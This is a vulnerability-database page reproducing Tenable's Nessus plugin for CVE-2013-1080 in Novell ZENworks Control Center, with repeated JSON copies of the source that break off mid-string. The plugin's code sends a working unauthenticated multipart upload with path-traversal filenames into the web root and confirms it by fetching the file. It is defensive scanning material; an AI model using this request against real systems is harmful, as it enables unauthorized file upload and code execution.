Search...

Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)

2013-06-18T00:00:00

ID NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL
Type nessus
Reporter This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.
Modified 2019-11-02T00:00:00

Description

The installed version of Novell ZENworks Control Center has a flaw with authentication checking on

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(66914);
  script_version("1.7");
  script_cvs_date("Date: 2018/11/15 20:50:18");

  script_cve_id("CVE-2013-1080");
  script_bugtraq_id(58668);

  script_name(english:"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)");
  script_summary(english:"Tries to upload file");

  script_set_attribute(attribute:"synopsis", value:"The remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The installed version of Novell ZENworks Control Center has a flaw with
authentication checking on '/zenworks/jsp/index.jsp' that can allow a
remote, unauthenticated attacker to upload arbitrary files and execute
them with SYSTEM privileges.  Nessus has exploited this vulnerability to
upload a file to the '/zenworks/css' directory."
  );
  script_set_attribute(attribute:"see_also", value:"https://support.microfocus.com/kb/doc.php?id=7011812");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-049/");
  script_set_attribute(attribute:"solution", value:
"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a
Monthly Update 1 for 11.2.3 installs.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Novell ZENworks Configuration Management 11 SP2 File Upload");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Novell ZENworks Configuration Management Remote Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/03/22");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/03/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/06/18");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:novell:zenworks_configuration_management");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");

  script_dependencies("os_fingerprint.nasl", "novell_zenworks_control_center_detect.nasl");
  script_require_ports("Services/www", 443);
  script_require_keys("www/zenworks_control_center");
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");

port = get_http_port(default:443);

install = get_install_from_kb(
  appname      : "zenworks_control_center",
  port         : port,
  exit_on_fail : TRUE
);

boundary = '----------Nessus';

# Determine what to look for.
os = get_kb_item("Host/OS");
if (os && report_paranoia &lt; 2)
{
  if ("Windows" &gt;&lt; os) traversals = make_list('..\\webapps\\zenworks\\css\\');
  else traversals = make_list('..\\..\\opt\\novell\\zenworks\\share\\tomcat\\webapps\\css\\',
                              '../../opt/novell/zenworks/share/tomcat/webapps/css/');
}
else
{
  traversals = make_list('..\\webapps\\zenworks\\css\\',
                         '..\\..\\opt\\novell\\zenworks\\share\\tomcat\\webapps\\css\\',
                         '../../opt/novell/zenworks/share/tomcat/webapps/css/');
}

fname = rand_str(length:8) + '_nessus.txt';
msg = 'file created by nessus : ' + SCRIPT_NAME;

vuln = FALSE;
foreach traversal (traversals)
{
  postdata =
    '--' + boundary + '\r\n' +
    'Content-Disposition: form-data; name="mainPage:_ctrl21a:FindFile:filePathTextBox"; '+
    'filename="' + traversal + fname + '"' + '\r\n' +
    'Content-Type: text/plain\r\n' +
    '\r\n' +
    msg +
    '\r\n' +
    '--' + boundary + '--' + '\r\n';

  host = NULL;
  hn = get_kb_item('www/'+port+'/http11_hostname');
  if (! isnull(hn))
    host = hn;
  else
  {
    host = get_preference('sc.hostname.' + get_host_ip());
    if (strlen(host) == 0) host = get_host_name();
  }

  if( isnull(host)) exit(1, 'Error getting host name.');

  rq = make_array();
  rq['$data'] = postdata;
  rq['$method'] = 'POST';

  rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';
  rq['$port'] = port;
  rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';

  rq['Content-Length'] = strlen(postdata);
  rq['Host'] = host;
  rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;

  # nb: the server requires the data to be sent in this exact manner,
  # or the exploit won't work.  I couldn't get this to work using
  # http_send_recv3() because it calls http_mk_req() which adds extra
  # headers that cause the exploit to fail
  w = http_send_recv_req(port: port, req: rq,
                         exit_on_fail: TRUE);

  if ("302" &gt;!&lt; w[0]) continue;

  exploit_req = http_last_sent_request();

  res = http_send_recv3(method:"GET",
                        item:"/zenworks/css/" + fname,
                        port:port,
                        exit_on_fail:TRUE);
  if (res[2] == msg)
  {
    vuln = TRUE;
    break;
  }
}

if (vuln)
{
  if(report_verbosity &gt; 0)
  {
    report =
    '\n  Nessus was able to upload a file to the server with the following' +
    '\n  request :\n\n' +
    crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30) + '\n' +
    chomp(exploit_req) + '\n' +
    crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30) + '\n\n' +
    '\n  It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}
else
  audit(AUDIT_WEB_APP_NOT_AFFECTED, "Novell ZENworks Control Center", build_url(port:port, qs:'/'));

JSON Vulners Source

Initial Source

{"id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "bulletinFamily": "scanner", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "description": "The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on ", "published": "2013-06-18T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/66914", "reporter": "This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-13-049/", "https://support.microfocus.com/kb/doc.php?id=7011812"], "cvelist": ["CVE-2013-1080"], "type": "nessus", "lastseen": "2019-11-01T03:00:24", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:novell:zenworks_configuration_management"], "cvelist": ["CVE-2013-1080"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on ", "edition": 10, "enchantments": {"dependencies": {"modified": "2019-10-28T20:47:17", "references": [{"idList": ["CVE-2013-1080"], "type": "cve"}, {"idList": ["NOVELL_ZCC_RCE.NASL"], "type": "nessus"}, {"idList": ["E-318"], "type": "dsquare"}, {"idList": ["SAINT:C3531EE26357FAABF8C0AF2404E0F11F", "SAINT:85C63EDF8538DBC326B3583D7C8AC0EA", "SAINT:94F8E6CAEFFA04E9B0850B791E66098C"], "type": "saint"}, {"idList": ["ZDI-13-049"], "type": "zdi"}, {"idList": ["1337DAY-ID-20599"], "type": "zdt"}, {"idList": ["D2SEC_ZCM2"], "type": "d2"}, {"idList": ["PACKETSTORM:121042"], "type": "packetstorm"}, {"idList": ["EDB-ID:24938"], "type": "exploitdb"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/ZENWORKS_CONTROL_CENTER_UPLOAD"], "type": "metasploit"}]}, "score": {"modified": "2019-10-28T20:47:17", "value": 8.3, "vector": "NONE"}}, "hash": "e01f442fa54bbbe31e1c129ac317899727660fe55222d751c48585deb5b1fb65", "hashmap": [{"hash": "95a0a2a2e39f7412af46fcac0cebe0bf", "key": "cvelist"}, {"hash": "98da6d012ea545a1e6678fc9f410f0cd", "key": "published"}, {"hash": "6a95d4214f12750e340ba0b31813bc2f", "key": "href"}, {"hash": "e6d6950356cc053768dc31379220b136", "key": "pluginID"}, {"hash": "1758aa7ce8ec03c7d8f476d27f7fc18f", "key": "title"}, {"hash": "e2b2244f868feb1714d67ab299c5131c", "key": "description"}, {"hash": "de435e0277c005ba6f706cbc59d9eef7", "key": "sourceData"}, {"hash": "5be30e03e787d644feaf8f202e413723", "key": "references"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "528cea5b87bf77107bd9f05291bbffe5", "key": "reporter"}, {"hash": "068b77d157186fca8172f86db425ec10", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/66914", "id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "lastseen": "2019-10-28T20:47:17", "modified": "2019-10-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "66914", "published": "2013-06-18T00:00:00", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-13-049/", "https://support.microfocus.com/kb/doc.php?id=7011812"], "reporter": "This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microfocus.com/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' + get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "type": "nessus", "viewCount": 6}, "differentElements": ["modified"], "edition": 10, "lastseen": "2019-10-28T20:47:17"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:novell:zenworks_configuration_management"], "cvelist": ["CVE-2013-1080"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-01-16T20:16:12", "references": [{"idList": ["CVE-2013-1080"], "type": "cve"}, {"idList": ["NOVELL_ZCC_RCE.NASL"], "type": "nessus"}, {"idList": ["E-318"], "type": "dsquare"}, {"idList": ["SAINT:C3531EE26357FAABF8C0AF2404E0F11F", "SAINT:85C63EDF8538DBC326B3583D7C8AC0EA", "SAINT:94F8E6CAEFFA04E9B0850B791E66098C"], "type": "saint"}, {"idList": ["ZDI-13-049"], "type": "zdi"}, {"idList": ["1337DAY-ID-20599"], "type": "zdt"}, {"idList": ["D2SEC_ZCM2"], "type": "d2"}, {"idList": ["PACKETSTORM:121042"], "type": "packetstorm"}, {"idList": ["EDB-ID:24938"], "type": "exploitdb"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/ZENWORKS_CONTROL_CENTER_UPLOAD"], "type": "metasploit"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "bcd084a936cf869854b2c3e1663c141d29a1e7020f578b59a6d9d530e4340327", "hashmap": [{"hash": "95a0a2a2e39f7412af46fcac0cebe0bf", "key": "cvelist"}, {"hash": "98da6d012ea545a1e6678fc9f410f0cd", "key": "published"}, {"hash": "3a524fd6a9dc6004ee89240118dbcb9e", "key": "description"}, {"hash": "e6d6950356cc053768dc31379220b136", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1758aa7ce8ec03c7d8f476d27f7fc18f", "key": "title"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "de435e0277c005ba6f706cbc59d9eef7", "key": "sourceData"}, {"hash": "5be30e03e787d644feaf8f202e413723", "key": "references"}, {"hash": "b054a9b5b61ea3f1b7b1945d2f188b19", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "068b77d157186fca8172f86db425ec10", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66914", "id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "lastseen": "2019-01-16T20:16:12", "modified": "2018-11-15T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "66914", "published": "2013-06-18T00:00:00", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-13-049/", "https://support.microfocus.com/kb/doc.php?id=7011812"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microfocus.com/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' + get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 8, "lastseen": "2019-01-16T20:16:12"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:novell:zenworks_configuration_management"], "cvelist": ["CVE-2013-1080"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The installed version of Novell ZENworks Control Center has a flaw with authentication checking on '/zenworks/jsp/index.jsp' that can allow a remote, unauthenticated attacker to upload arbitrary files and execute them with SYSTEM privileges. Nessus has exploited this vulnerability to upload a file to the '/zenworks/css' directory.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "66647e2799f052476dc65668cb2997b3c8b1c1073d6d1208fef6813eb21a0b87", "hashmap": [{"hash": "95a0a2a2e39f7412af46fcac0cebe0bf", "key": "cvelist"}, {"hash": "98da6d012ea545a1e6678fc9f410f0cd", "key": "published"}, {"hash": "e6d6950356cc053768dc31379220b136", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1758aa7ce8ec03c7d8f476d27f7fc18f", "key": "title"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "de435e0277c005ba6f706cbc59d9eef7", "key": "sourceData"}, {"hash": "5be30e03e787d644feaf8f202e413723", "key": "references"}, {"hash": "b054a9b5b61ea3f1b7b1945d2f188b19", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "04945d09bd1c4ab9a7408d7cd4659431", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "068b77d157186fca8172f86db425ec10", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66914", "id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "lastseen": "2018-11-17T03:15:20", "modified": "2018-11-15T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "66914", "published": "2013-06-18T00:00:00", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-13-049/", "https://support.microfocus.com/kb/doc.php?id=7011812"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microfocus.com/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n 